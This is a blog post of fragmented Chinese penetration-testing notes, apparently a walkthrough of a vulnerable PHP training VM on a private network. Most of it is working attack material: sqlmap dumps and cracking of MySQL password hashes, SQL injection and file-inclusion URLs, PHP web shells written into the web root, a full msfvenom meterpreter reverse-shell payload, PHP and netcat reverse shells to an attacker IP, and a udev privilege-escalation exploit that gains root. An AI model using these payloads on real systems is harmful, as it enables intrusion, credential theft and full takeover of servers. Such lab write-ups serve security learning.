| Host | User | Password | ssl_type | Drop_priv | File_priv | Alter_priv | Grant_priv | Index_priv | Super_priv | ssl_cipher | Create_priv | Delete_priv | Insert_priv | Reload_priv | Select_priv | Update_priv | max_updates | x509_issuer | Execute_priv | Process_priv | Show_db_priv | x509_subject | Shutdown_priv | max_questions | Show_view_priv | References_priv | Repl_slave_priv | max_connections | Create_user_priv | Create_view_priv | Lock_tables_priv | Repl_client_priv | Alter_routine_priv | Create_routine_priv | max_user_connections | Create_tmp_table_priv |
+-----------------------+----------+------------------------------+----------+-----------+-----------+------------+------------+------------+------------+------------+-------------+-------------+-------------+-------------+-------------+-------------+-------------+-------------+--------------+--------------+--------------+--------------+---------------+---------------+----------------+-----------------+-----------------+-----------------+------------------+------------------+------------------+------------------+--------------------+---------------------+----------------------+-----------------------+
| localhost | root | 6cbbdf9b35eb7db1 (mysqlpass) | <blank> | Y | Y | Y | Y | Y | Y | <blank> | Y | Y | Y | Y | Y | Y | 0 | <blank> | Y | Y | Y | <blank> | Y | 0 | Y | Y | Y | 0 | Y | Y | Y | Y | Y | Y | 0 | Y |
| localhost.localdomain | root | <blank> | <blank> | Y | Y | Y | Y | Y | Y | <blank> | Y | Y | Y | Y | Y | Y | 0 | <blank> | Y | Y | Y | <blank> | Y | 0 | Y | Y | Y | 0 | Y | Y | Y | Y | Y | Y | 0 | Y |
| 127.0.0.1 | root | <blank> | <blank> | Y | Y | Y | Y | Y | Y | <blank> | Y | Y | Y | Y | Y | Y | 0 | <blank> | Y | Y | Y | <blank> | Y | 0 | Y | Y | Y | 0 | Y | Y | Y | Y | Y | Y | 0 | Y |
| % | cms_user | 2e0cfd856355b099 | <blank> | Y | Y | Y | N | Y | Y | <blank> | Y | Y | Y | Y | Y | Y | 0 | <blank> | Y | Y | Y | <blank> | Y | 0 | Y | Y | Y | 0 | Y | Y | Y | Y | Y | Y | 0 | Y |
+-----------------------+----------+------------------------------+----------+-----------+-----------+------------+------------+------------+------------+------------+-------------+-------------+-------------+-------------+-------------+-------------+-------------+-------------+--------------+--------------+--------------+--------------+---------------+---------------+----------------+-----------------+-----------------+-----------------+------------------+------------------+------------------+------------------+--------------------+---------------------+----------------------+-----------------------+
[23:19:15] [INFO] table 'mysql.`user`' dumped to CSV file '/root/.local/share/sqlmap/output/172.16.70.141/dump/mysql/user.csv'
[23:19:15] [INFO] fetched data logged to text files under '/root/.local/share/sqlmap/output/172.16.70.141'
[*] ending @ 23:19:15 /2021-11-29/
┌──(root💀kwkl)-[~]
└─# sqlmap -u 'http://172.16.70.141/index.php?id=3' -D mysql -T user -C User,Password --dump
___
__H__
___ ___[)]_____ ___ ___ {1.5.10#stable}
|_ -| . [.] | .'| . |
|___|_ [(]_|_|_|__,| _|
|_|V... |_| https://sqlmap.org
[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program
[*] starting @ 23:19:36 /2021-11-29/
[23:19:37] [INFO] resuming back-end DBMS 'mysql'
[23:19:37] [INFO] testing connection to the target URL
you have not declared cookie(s), while server wants to set its own ('PHPSESSID=5k4l78aruoi...53j1etnj30'). Do you want to use those [Y/n] y
sqlmap resumed the following injection point(s) from stored session:
---
Parameter: id (GET)
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: id=3 AND 9068=9068
Type: time-based blind
Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
Payload: id=3 AND (SELECT 1514 FROM (SELECT(SLEEP(5)))zENA)
Type: UNION query
Title: Generic UNION query (NULL) - 7 columns
Payload: id=3 UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,CONCAT(0x71626a7171,0x644c49467875614873585a5669644f7a74445a417779496e72634a56474474595a6e437542477350,0x716a6b6271)-- -
---
[23:19:38] [INFO] the back-end DBMS is MySQL
web server operating system: Linux CentOS 5
web application technology: PHP 5.2.6, PHP, Apache 2.2.3
back-end DBMS: MySQL >= 5.0.12
[23:19:38] [INFO] fetching entries of column(s) 'Password,`User`' for table 'user' in database 'mysql'
[23:19:38] [INFO] recognized possible password hashes in column 'Password'
do you want to store hashes to a temporary file for eventual further processing with other tools [y/N] y
[23:19:39] [INFO] writing hashes to a temporary file '/tmp/sqlmapfgwkgd6528295/sqlmaphashes-hgq2jwa1.txt'
do you want to crack them via a dictionary-based attack? [Y/n/q] y
[23:19:40] [INFO] using hash method 'mysql_old_passwd'
[23:19:40] [INFO] resuming password 'mysqlpass' for hash '6cbbdf9b35eb7db1'
what dictionary do you want to use?
[1] default dictionary file '/usr/share/sqlmap/data/txt/wordlist.tx_' (press Enter)
[2] custom dictionary file
[3] file with list of dictionary files
>
[23:19:42] [INFO] using default dictionary
do you want to use common password suffixes? (slow!) [y/N] y
[23:19:43] [INFO] starting dictionary-based cracking (mysql_old_passwd)
[23:19:43] [INFO] starting 12 processes
[23:19:49] [INFO] using suffix '1'
[23:19:57] [INFO] using suffix '123'
[23:20:05] [INFO] using suffix '2'
[23:20:13] [INFO] using suffix '12'
[23:20:21] [INFO] using suffix '3'
[23:20:29] [INFO] using suffix '13'
[23:20:37] [INFO] using suffix '7'
[23:20:45] [INFO] using suffix '11'
[23:20:53] [INFO] using suffix '5'
[23:21:01] [INFO] using suffix '22'
[23:21:09] [INFO] using suffix '23'
[23:21:17] [INFO] using suffix '01'
[23:21:25] [INFO] using suffix '4'
[23:21:33] [INFO] using suffix '07'
[23:21:41] [INFO] using suffix '21'
[23:21:50] [INFO] using suffix '14'
[23:21:58] [INFO] using suffix '10'
[23:22:06] [INFO] using suffix '06'
[23:22:14] [INFO] using suffix '08'
[23:22:23] [INFO] using suffix '8'
[23:22:32] [INFO] using suffix '15'
[23:22:40] [INFO] using suffix '69'
[23:22:48] [INFO] using suffix '16'
[23:22:56] [INFO] using suffix '6'
[23:23:03] [INFO] using suffix '18'
[23:23:11] [INFO] using suffix '!'
[23:23:18] [INFO] using suffix '.'
[23:23:26] [INFO] using suffix '*'
[23:23:34] [INFO] using suffix '!!'
[23:23:41] [INFO] using suffix '?'
[23:23:49] [INFO] using suffix ';'
[23:23:56] [INFO] using suffix '..'
[23:24:05] [INFO] using suffix '!!!'
[23:24:13] [INFO] using suffix ', '
[23:24:21] [INFO] using suffix '@'
Database: mysql
Table: user
[4 entries]
+----------+------------------------------+
| User | Password |
+----------+------------------------------+
| root | 6cbbdf9b35eb7db1 (mysqlpass) |
| root | <blank> |
| root | <blank> |
| cms_user | 2e0cfd856355b099 |
+----------+------------------------------+
[23:24:29] [INFO] table 'mysql.`user`' dumped to CSV file '/root/.local/share/sqlmap/output/172.16.70.141/dump/mysql/user.csv'
[23:24:29] [INFO] fetched data logged to text files under '/root/.local/share/sqlmap/output/172.16.70.141'
[*] ending @ 23:24:29 /2021-11-29/
┌──(root💀kwkl)-[~]
└─#
┌──(root💀kwkl)-[~]
└─# sqlmap -dmysql://root:root@172.16.70.141:3306/cms --sql-shellselect @@version; 2 ⨯
___
__H__
___ ___[)]_____ ___ ___ {1.5.10#stable}
|_ -| . ['] | .'| . |
|___|_ ["]_|_|_|__,| _|
|_|V... |_| https://sqlmap.org
Usage: python3 sqlmap [options]
sqlmap: error: no such option: --sql-shellselect
┌──(root💀kwkl)-[~]
└─#
http://172.16.61.130/,apache_tmp.php?cmd=uname%20-a;%20cat
%20/etc/redhat-release
http://172.16.70.141/,apache_tmp.php?cmd=uname%20-a;%20cat%20/etc/passwd
http://172.16.70.141/actions/login.php?action=../../conf/config.ini%00
http://172.16.70.141/actions/login.php?action=backdoor.php?cmd=ls%20/tmp%00
id=-1')) union select 1,"<?php phpinfo();?>",3 into outfile "\\tmp\\1.php"%23
http://172.16.70.141/index.php?id=4%20UNION%20select%201,load_file(%27/var/www/html/actions/login.php%27),3,4,5,6,7%20from%20dual
http://172.16.70.141/?id=4%20UNION%20select%201,load_file(%27/var/www/html/index.php%27),3,4,5,6,7%20from%20dual
%20UNION%20select%201,load_file(%27/var/www/html/actions/login.php%27),3,4,5,6,7%20from%20dual
https://172.16.70.141/index.php?id=1%20%20UNION%20select%201,load_file(%27/var/www/html/index.php%27),3,4,5,6,7%20from%20dual
* **/ //make sure the app will run! include_once('inc/config_check.php'); session_start(); $logged_in = isset($_COOKIE['logged_in']) ? $_COOKIE['logged_in'] : 0; //get configuration variables $configs = parse_ini_file('conf/config.ini') or die("Error parsing config file conf/config.ini"); //set up loggin include_once('lib/log.class.php'); $log = new Log(); //set up the db connection $conn = mysql_connect($configs['database_host'], $configs['database_user'], $configs['database_pass']) or $log->append(mysqlerror()); mysql_select_db($configs['database_db']); $action = (isset($_GET['action'])) ? $_GET['action'] : 'default'; $valid_actions = array( 'default', 'login', 'add_event', 'edit_event', 'view_event', 'delete_event', 'logout', 'users', 'logs'); //auth check $is_admin = 0; if (isset($_COOKIE['user_id']) && isset($_COOKIE['hash'])) { $sql = 'SELECT user_id FROM user WHERE user_id = ' . $_COOKIE['user_id'] . ' AND user_password = \'' . $_COOKIE['hash'] . '\''; $retval = mysql_query($sql) or $log->append("Problem with sql $sql " . mysql_error()); if (mysql_num_rows($retval) > 0 ) $is_admin = 1; } $admin_actions = array('add_event', 'edit_event', 'view_event', 'delete_event', 'users', 'logs'); if (in_array($action, $admin_actions) && ! $is_admin) $action = 'default'; if (! in_array($action, $valid_actions)) $action = 'default'; if ($action != 'delete_event' && $action != 'logout') include_once('inc/header.php'); include_once('actions/'.$action . '.php'); include_once('inc/footer.php'); ?>
Posted by: 7
image3
http://172.16.70.141/index.php?id=1%20UNION%20select%201,load_file(%27/var/www/html/actions/login.php%27),3,4,5,6,7%20from%20dual
* **/ $logged_in = isset($_COOKIE['logged_in']) ? $_COOKIE['logged_in'] : 0; if (isset($_POST['username']) && isset($_POST['password'])) { $sql = "select user_id from user where user_username = '" . $_POST['username'] . "'"; $query = mysql_query($sql) or die("Query error with $sql: " . mysql_error()); if ($query && mysql_num_rows($query) > 0) { //user exists $uname = mysql_fetch_object($query); $sql = "select * from user where user_id = " . $uname->user_id . " AND user_password = md5('" . $_POST['password'] . "')"; $query = mysql_query($sql) or $log->append("Query error in login $sql " . mysql_error()); $retval = array(); if (! $query) { //no return value } else { $retval = mysql_fetch_object($query); } } if (isset($retval->user_id)) { setcookie("logged_in", 1, time()+3600); setcookie("user_id", $retval->user_id, time()+3600); setcookie("hash", $retval->user_password, time()+3600); $logged_in = 1; } } if ($logged_in) include_once('templates/logged_in.tpl'); else include_once('templates/'.$_GET['action'].'.tpl'); ?>
Posted by: 7
image3
http://172.16.70.141/index.php?id=1%20UNION%20select%20NULL,NULL,NULL,NULL,NULL,NULL,%27%3C?php%20echo%20system($_POST[\%27cmd\%27]);?%3E%27%20INTO%20OUTFILE%20%27/tmp/008st7845.php%27
http://172.16.70.141/index.php?id=1%20UNION%20select%20NULL,NULL,NULL,NULL,NULL,NULL,%27%3C?php%20echo%20system($_POST[\%27cmd\%27]);?%3E%27%20INTO%20OUTFILE%20%27/tmp/008st7845.php%27
http://172.16.70.141/actions/login.php?action=/tmp/008st7845.php?cmd=ls%20/tmp%00
http://172.16.70.141/actions/login.php?action=../../conf/config.ini%00
http://172.16.70.141/actions/login.php?action=../../../../tmp/008st7845.php%00
http://172.16.70.141/actions/login.php?action=../../../../tmp/008st7845.php?cmd=ls%20/tmp%00
(1)连接数据库
sqlmap -d "mysql://root:mysqlpass@172.16.70.141:3306/mysql" --os-shell
CREATE DATABASE foo;CREATE TABLE foo.bar ( baz VARCHAR(100) PRIMARY KEY );INSERT INTO foo.bar SELECT "<?php file_put_contents('shell.php','<?php @eval($_POST[1]);?>');?>";
select '<?php @eval($_POST[1]);?>' into outfile '/var/www/html/11.php';
查看慢查询日志开启情况show variables like '%slow_query_log%';开启慢查询日志set global slow_query_log=1;修改日志文件存储的绝对路径set global slow_query_log_file='E:/phpStudy2018/PHPTutorial/WWW/shell.php';向日志文件中写入shellselect '<?php @eval($_POST[1]);?>' or sleep(11);
————————————————
版权声明:本文为CSDN博主「weixin_39872872」的原创文章,遵循CC 4.0 BY-SA版权协议,转载请附上原文出处链接及本声明。
原文链接:https://blog.csdn.net/weixin_39872872/article/details/112589789
cmd=echo "<?php echo system(\$_GET['cmd']);?>" > /var/www/html/.apache_tmp.php
cmd=echo "<?php @eval($_POST[1]);?>" > /var/www/html/.apache_tmp.php
iles/palm-pilot.png 1 13 admin \N \N \N \N \N \N root:x:0:0:root:/root:/bin/bash bin:x:1:1:bin:/bin:/sbin/nologin daemon:x:2:2:daemon:/sbin:/sbin/nologin adm:x:3:4:adm:/var/adm:/sbin/nologin lp:x:4:7:lp:/var/spool/lpd:/sbin/nologin sync:x:5:0:sync:/sbin:/bin/sync shutdown:x:6:0:shutdown:/sbin:/sbin/shutdown halt:x:7:0:halt:/sbin:/sbin/halt mail:x:8:12:mail:/var/spool/mail:/sbin/nologin news:x:9:13:news:/etc/news: uucp:x:10:14:uucp:/var/spool/uucp:/sbin/nologin operator:x:11:0:operator:/root:/sbin/nologin games:x:12:100:games:/usr/games:/sbin/nologin gopher:x:13:30:gopher:/var/gopher:/sbin/nologin ftp:x:14:50:FTP User:/var/ftp:/sbin/nologin nobody:x:99:99:Nobody:/:/sbin/nologin rpm:x:37:37::/var/lib/rpm:/sbin/nologin dbus:x:81:81:System message bus:/:/sbin/nologin avahi:x:70:70:Avahi daemon:/:/sbin/nologin mailnull:x:47:47::/var/spool/mqueue:/sbin/nologin smmsp:x:51:51::/var/spool/mqueue:/sbin/nologin distcache:x:94:94:Distcache:/:/sbin/nologin apache:x:48:48:Apache:/var/www:/sbin/nologin nscd:x:28:28:NSCD Daemon:/:/sbin/nologin vcsa:x:69:69:virtual console memory owner:/dev:/sbin/nologin rpc:x:32:32:Portmapper RPC user:/:/sbin/nologin rpcuser:x:29:29:RPC Service User:/var/lib/nfs:/sbin/nologin nfsnobody:x:65534:65534:Anonymous NFS User:/var/lib/nfs:/sbin/nologin sshd:x:74:74:Privilege-separated SSH:/var/empty/sshd:/sbin/nologin squid:x:23:23::/var/spool/squid:/sbin/nologin mysql:x:27:27:MySQL Server:/var/lib/mysql:/bin/bash pcap:x:77:77::/var/arpwatch:/sbin/nologin haldaemon:x:68:68:HAL daemon:/:/sbin/nologin dovecot:x:97:97:dovecot:/usr/libexec/dovecot:/sbin/nologin john:x:500:500::/home/john:/bin/bash linda:x:501:501::/home/linda:/bin/bash fred:x:502:502::/home/fred:/bin/bash molly:x:503:503::/home/molly:/bin/bash toby:x:504:504::/home/toby:/bin/bash toby:x:504:504::/home/toby:/bin/bash
1 | 25e4ee4e9229397b6b17776bfceaf8e7 (adminpass) | admin
cmd=echo "<?php echo @eval($_POST[x]);?>" > /var/www/html/.apache_tmp.php
cmd=echo "<?php echo system(\$_GET['cmd']);?>" > /var/www/html/2.php
select '<?php @eval($_POST[1]);?>' into outfile '/var/www/html/2.php'
cmd=cp /tmp/008st7846.php /var/www/html/11.php
cmd=chmod 777 /var/www/html/11.php
cmd=chmod 777 /var/www/html/nc
cmd=/var/www/html/netcat -e
/bin/sh 172.16.61.132 3333
pinginglab方法::::
nmap -A -v -sS -sV -p- 172.16.70.141
http://172.16.70.141/index.php?id=4AND%20SLEEP(5)
='admin', user_password=md5('adminpass');
http://172.16.70.141/sql/db.sql
http://172.16.70.141/docs/
http://172.16.70.141/actions/login.php?action=../../../../etc/passwd%00
root:x:0:0:root:/root:/bin/bash bin:x:1:1:bin:/bin:/sbin/nologin daemon:x:2:2:daemon:/sbin:/sbin/nologin adm:x:3:4:adm:/var/adm:/sbin/nologin lp:x:4:7:lp:/var/spool/lpd:/sbin/nologin sync:x:5:0:sync:/sbin:/bin/sync shutdown:x:6:0:shutdown:/sbin:/sbin/shutdown halt:x:7:0:halt:/sbin:/sbin/halt mail:x:8:12:mail:/var/spool/mail:/sbin/nologin news:x:9:13:news:/etc/news: uucp:x:10:14:uucp:/var/spool/uucp:/sbin/nologin operator:x:11:0:operator:/root:/sbin/nologin games:x:12:100:games:/usr/games:/sbin/nologin gopher:x:13:30:gopher:/var/gopher:/sbin/nologin ftp:x:14:50:FTP User:/var/ftp:/sbin/nologin nobody:x:99:99:Nobody:/:/sbin/nologin rpm:x:37:37::/var/lib/rpm:/sbin/nologin dbus:x:81:81:System message bus:/:/sbin/nologin avahi:x:70:70:Avahi daemon:/:/sbin/nologin mailnull:x:47:47::/var/spool/mqueue:/sbin/nologin smmsp:x:51:51::/var/spool/mqueue:/sbin/nologin distcache:x:94:94:Distcache:/:/sbin/nologin apache:x:48:48:Apache:/var/www:/sbin/nologin nscd:x:28:28:NSCD Daemon:/:/sbin/nologin vcsa:x:69:69:virtual console memory owner:/dev:/sbin/nologin rpc:x:32:32:Portmapper RPC user:/:/sbin/nologin rpcuser:x:29:29:RPC Service User:/var/lib/nfs:/sbin/nologin nfsnobody:x:65534:65534:Anonymous NFS User:/var/lib/nfs:/sbin/nologin sshd:x:74:74:Privilege-separated SSH:/var/empty/sshd:/sbin/nologin squid:x:23:23::/var/spool/squid:/sbin/nologin mysql:x:27:27:MySQL Server:/var/lib/mysql:/bin/bash pcap:x:77:77::/var/arpwatch:/sbin/nologin haldaemon:x:68:68:HAL daemon:/:/sbin/nologin dovecot:x:97:97:dovecot:/usr/libexec/dovecot:/sbin/nologin john:x:500:500::/home/john:/bin/bash linda:x:501:501::/home/linda:/bin/bash fred:x:502:502::/home/fred:/bin/bash molly:x:503:503::/home/molly:/bin/bash toby:x:504:504::/home/toby:/bin/bash
1 | 25e4ee4e9229397b6b17776bfceaf8e7 (adminpass) | admin
下载审计
default.php
<?php
/**
* This is the default controller.
* This application is meant to be part of the PHP Code Auditing
* course offered by SAS Information Security. Don *not* install
* this application on a live server
*
* @package PHP Code Auditing
* @author Justin C. Klein Keane <jukeane@sas.upenn.edu>
*
**/
$id = isset($_GET['id']) ? $_GET['id'] : 0;
在default.php文件中发现SQL注入代码,对用户可控的参数$id没有进行任 何的过滤或验证,会发生注入缺陷。
文件包含
if ($logged_in)
include_once('templates/logged_in.tpl');
else
include_once('templates/'.$_GET['action'].'.tpl');
?>
在login.php中发现了文件包含,实际测试中需要使用%00阶段绕过
269 msfvenom -p php/meterpreter/reverse_tcp LHOST=172.16.70.122 LPORT=4444 -o shell.php
┌──(kwkl㉿kwkl)-[~/HODL/ctf5]
└─$ msfvenom -p php/meterpreter/reverse_tcp LHOST=172.16.70.122 LPORT=4444 -o shell.php 1 ⨯
[-] No platform was selected, choosing Msf::Module::Platform::PHP from the payload
[-] No arch selected, selecting arch: php from the payload
No encoder specified, outputting raw payload
Payload size: 1114 bytes
Saved as: shell.php
┌──(kwkl㉿kwkl)-[~/HODL/ctf5]
└─$ ls 2 ⨯
shell.php
┌──(kwkl㉿kwkl)-[~/HODL/ctf5]
└─$ cat shell.php
/*<?php /**/ error_reporting(0); $ip = '172.16.70.122'; $port = 4444; if (($f = 'stream_socket_client') && is_callable($f)) { $s = $f("tcp://{$ip}:{$port}"); $s_type = 'stream'; } if (!$s && ($f = 'fsockopen') && is_callable($f)) { $s = $f($ip, $port); $s_type = 'stream'; } if (!$s && ($f = 'socket_create') && is_callable($f)) { $s = $f(AF_INET, SOCK_STREAM, SOL_TCP); $res = @socket_connect($s, $ip, $port); if (!$res) { die(); } $s_type = 'socket'; } if (!$s_type) { die('no socket funcs'); } if (!$s) { die('no socket'); } switch ($s_type) { case 'stream': $len = fread($s, 4); break; case 'socket': $len = socket_read($s, 4); break; } if (!$len) { die(); } $a = unpack("Nlen", $len); $len = $a['len']; $b = ''; while (strlen($b) < $len) { switch ($s_type) { case 'stream': $b .= fread($s, $len-strlen($b)); break; case 'socket': $b .= socket_read($s, $len-strlen($b)); break; } } $GLOBALS['msgsock'] = $s; $GLOBALS['msgsock_type'] = $s_type; if (extension_loaded('suhosin') && ini_get('suhosin.executor.disable_eval')) { $suhosin_bypass=create_function('', $b); $suhosin_bypass(); } else { eval($b); } die();
上传shell
1 | 25e4ee4e9229397b6b17776bfceaf8e7 (adminpass) | admin
use exploit/multi/handler
set payload php/meterpreter/reverse_tcp set lhost kali的IP
exploit
http://172.16.70.141/files/shell.php
after upload darkshell
uname -a
Linux localhost.localdomain 2.6.18-92.el5 #1 SMP Tue Jun 10 18:49:47 EDT 2008 i686 i686 i386 GNU/Linux
cat /etc/passwd | grep apache
apache:x:48:48:Apache:/var/www:/sbin/nologin
cat /etc/redhat-release
cat /etc/redhat-release
CentOS release 5.2 (Final)
download netcat
──(kwkl㉿kwkl)-[~/HODL/ctf5]
└─$ wget https://sourceforge.net/projects/netcat/files/netcat/0.7.1/netcat-0.7.1-1.i386.rpm
--2021-12-19 23:14:15-- https://sourceforge.net/projects/netcat/files/netcat/0.7.1/netcat-0.7.1-1.i386.rpm
正在解析主机 sourceforge.net (sourceforge.net)... 204.68.111.105
正在连接 sourceforge.net (sourceforge.net)|204.68.111.105|:443... 已连接。
已发出 HTTP 请求,正在等待回应... 301 Moved Permanently
位置:https://sourceforge.net/projects/netcat/files/netcat/0.7.1/netcat-0.7.1-1.i386.rpm/ [跟随至新的 URL]
--2021-12-19 23:14:16-- https://sourceforge.net/projects/netcat/files/netcat/0.7.1/netcat-0.7.1-1.i386.rpm/
再次使用存在的到 sourceforge.net:443 的连接。
已发出 HTTP 请求,正在等待回应... 302 Found
位置:https://sourceforge.net/projects/netcat/files/netcat/0.7.1/netcat-0.7.1-1.i386.rpm/download [跟随至新的 URL]
--2021-12-19 23:14:16-- https://sourceforge.net/projects/netcat/files/netcat/0.7.1/netcat-0.7.1-1.i386.rpm/download
再次使用存在的到 sourceforge.net:443 的连接。
已发出 HTTP 请求,正在等待回应... 302 Found
位置:https://downloads.sourceforge.net/project/netcat/netcat/0.7.1/netcat-0.7.1-1.i386.rpm?ts=gAAAAABhv0xJOhKpxTJf8OxAINxwfaWxs7qCrIsOXuFZy8CuhDfSRg1vOqcRdAD0-HyAJw5OCAnbKMabLNncISYHhst5Pp7JYg%3D%3D&use_mirror=udomain&r= [跟随至新的 URL]
--2021-12-19 23:14:17-- https://downloads.sourceforge.net/project/netcat/netcat/0.7.1/netcat-0.7.1-1.i386.rpm?ts=gAAAAABhv0xJOhKpxTJf8OxAINxwfaWxs7qCrIsOXuFZy8CuhDfSRg1vOqcRdAD0-HyAJw5OCAnbKMabLNncISYHhst5Pp7JYg%3D%3D&use_mirror=udomain&r=
正在解析主机 downloads.sourceforge.net (downloads.sourceforge.net)... 204.68.111.105
正在连接 downloads.sourceforge.net (downloads.sourceforge.net)|204.68.111.105|:443... 已连接。
已发出 HTTP 请求,正在等待回应... 302 Found
位置:https://udomain.dl.sourceforge.net/project/netcat/netcat/0.7.1/netcat-0.7.1-1.i386.rpm [跟随至新的 URL]
--2021-12-19 23:14:18-- https://udomain.dl.sourceforge.net/project/netcat/netcat/0.7.1/netcat-0.7.1-1.i386.rpm
正在解析主机 udomain.dl.sourceforge.net (udomain.dl.sourceforge.net)... 203.135.147.10
正在连接 udomain.dl.sourceforge.net (udomain.dl.sourceforge.net)|203.135.147.10|:443... 已连接。
已发出 HTTP 请求,正在等待回应... 200 OK
长度:123912 (121K) [application/octet-stream]
正在保存至: “netcat-0.7.1-1.i386.rpm”
netcat-0.7.1-1.i386.rpm 100%[====================================================>] 121.01K 296KB/s 用时 0.4s
2021-12-19 23:14:20 (296 KB/s) - 已保存 “netcat-0.7.1-1.i386.rpm” [123912/123912])
┌──(kwkl㉿kwkl)-[~/HODL/ctf5]
└─$
rmp -Uvh netcat-0.7.1-1.i386.rpm
┌──(root💀kwkl)-[/opt/w3af-master/extras/docker]
└─# searchsploit Linux udev
----------------------------------------------------------------------------------------------------------------------------------------------- ---------------------------------
Exploit Title | Path
----------------------------------------------------------------------------------------------------------------------------------------------- ---------------------------------
Linux Kernel 2.6 (Debian 4.0 / Ubuntu / Gentoo) UDEV < 1.4.1 - Local Privilege Escalation (1) | linux/local/8478.sh
Linux Kernel 2.6 (Gentoo / Ubuntu 8.10/9.04) UDEV < 1.4.1 - Local Privilege Escalation (2) | linux/local/8572.c
Linux Kernel 4.8.0 UDEV < 232 - Local Privilege Escalation | linux/local/41886.c
Linux Kernel UDEV < 1.4.1 - 'Netlink' Local Privilege Escalation (Metasploit) | linux/local/21848.rb
QEMU - Denial of Service | linux/dos/47320.c
----------------------------------------------------------------------------------------------------------------------------------------------- ---------------------------------
Shellcodes: No Results
Papers: No Results
┌──(root💀kwkl)-[/opt/w3af-master/extras/docker]
└─#
chmod +x 8478.sh
-rwxr-xr-x 1 apache apache 3.3K Nov 28 16:26 8478.sh
查看内核进程用户进程的pid和状态: cat /proc/net/netlink
sk Eth Pid Groups Rmem Wmem Dump Locks cfebce00 0 0 00000000 0 0 00000000 2 cf830e00 0 3198 00000111 0 0 00000000 2 cfc5fa00 6 0 00000000 0 0 00000000 2 cfe78600 7 0 00000000 0 0 00000000 2 cf83b800 9 2528 00000000 0 0 00000000 2 cfe66e00 9 0 00000000 0 0 00000000 2 cf557c00 10 0 00000000 0 0 00000000 2 cf513c00 11 0 00000000 0 0 00000000 2 cfc5f400 15 569 ffffffff 0 0 00000000 2 cfebcc00 15 0 00000000 0 0 00000000 2 cf513a00 16 0 00000000 0 0 00000000 2 cf6b7c00 18 0 00000000 0 0 00000000 2
./8478.sh
/tmp/udev 569
./udev 568
`
修改cookie有惊喜
[
{
“name”: “roundcube_sessid”,
“value”: “n0f29i2hp5kv4ncg94fkrgga33”,
“domain”: “172.16.70.141”,
“hostOnly”: true,
“path”: “/”,
“secure”: false,
“httpOnly”: false,
“sameSite”: “no_restriction”,
“session”: true,
“firstPartyDomain”: “”,
“storeId”: null
},
{
“name”: “logged_in”,
“value”: “1”,
“domain”: “172.16.70.141”,
“hostOnly”: true,
“path”: “/”,
“secure”: false,
“httpOnly”: false,
“sameSite”: “no_restriction”,
“session”: true,
“firstPartyDomain”: “”,
“storeId”: null
},
{
“name”: “hash”,
“value”: “25e4ee4e9229397b6b17776bfceaf8e7”,
“domain”: “172.16.70.141”,
“hostOnly”: true,
“path”: “/”,
“secure”: false,
“httpOnly”: false,
“sameSite”: “no_restriction”,
“session”: true,
“firstPartyDomain”: “”,
“storeId”: null
},
{
“name”: “PHPSESSID”,
“value”: “vseftoonmq1vrd6vt4v1pb29s4”,
“domain”: “172.16.70.141”,
“hostOnly”: true,
“path”: “/”,
“secure”: false,
“httpOnly”: false,
“sameSite”: “no_restriction”,
“session”: true,
“firstPartyDomain”: “”,
“storeId”: null
},
{
“name”: “user_id”,
“value”: “1”,
“domain”: “172.16.70.141”,
“hostOnly”: true,
“path”: “/”,
“secure”: false,
“httpOnly”: false,
“sameSite”: “no_restriction”,
“session”: true,
“firstPartyDomain”: “”,
“storeId”: null
}
]
用一句话 上传大ma
Linux localhost.localdomain 2.6.18-92.el5 #1 SMP Tue Jun 10 18:49:47 EDT 2008 i686 i686 i386 GNU/Linux
[外链图片转存失败,源站可能有防盗链机制,建议将图片保存下来直接上传(img-QygDgnNb-1640526076767)(https://gitee.com/hashk8/hash32picgo/raw/master/imgs/image-20211219004914251.png)]
Php -v
php -r ‘$sock=fsockopen(“192.168.32.1”,6666);exec("/bin/sh -i <&3 >&3 2>&3");’
php -r ‘$sock=fsockopen(“172.16.70.122”,4444);exec("/bin/sh -i <&3 >&3 2>&3");’
得到shell
nc -vvlp 4444
php -r ‘$sock=fsockopen(“172.16.70.122”,4444);exec("/bin/sh -i <&3 >&3 2>&3");’
sh-3.2$ cat /proc/net/netlink
sk Eth Pid Groups Rmem Wmem Dump Locks
cfebce00 0 0 00000000 0 0 00000000 2
cf830e00 0 3198 00000111 0 0 00000000 2
cfc5fa00 6 0 00000000 0 0 00000000 2
cfe78600 7 0 00000000 0 0 00000000 2
cf83b800 9 2528 00000000 0 0 00000000 2
cfe66e00 9 0 00000000 0 0 00000000 2
cf557c00 10 0 00000000 0 0 00000000 2
cf513c00 11 0 00000000 0 0 00000000 2
cfc5f400 15 569 ffffffff 0 0 00000000 2
cfebcc00 15 0 00000000 0 0 00000000 2
cf513a00 16 0 00000000 0 0 00000000 2
cf6b7c00 18 0 00000000 0 0 00000000 2
sh-3.2$ ls
id
uid=48(apache) gid=48(apache) groups=48(apache)
./8478.sh 568
suid.c: In function 'main':
suid.c:3: warning: incompatible implicit declaration of built-in function 'execl'
id
id
id
id
^[[Auid=0(root) gid=0(root) groups=48(apache)
uid=0(root) gid=0(root) groups=48(apache)
uid=0(root) gid=0(root) groups=48(apache)
uid=0(root) gid=0(root) groups=48(apache)
内网渗透 nadao root
1660
被折叠的 条评论
为什么被折叠?
到【灌水乐园】发言
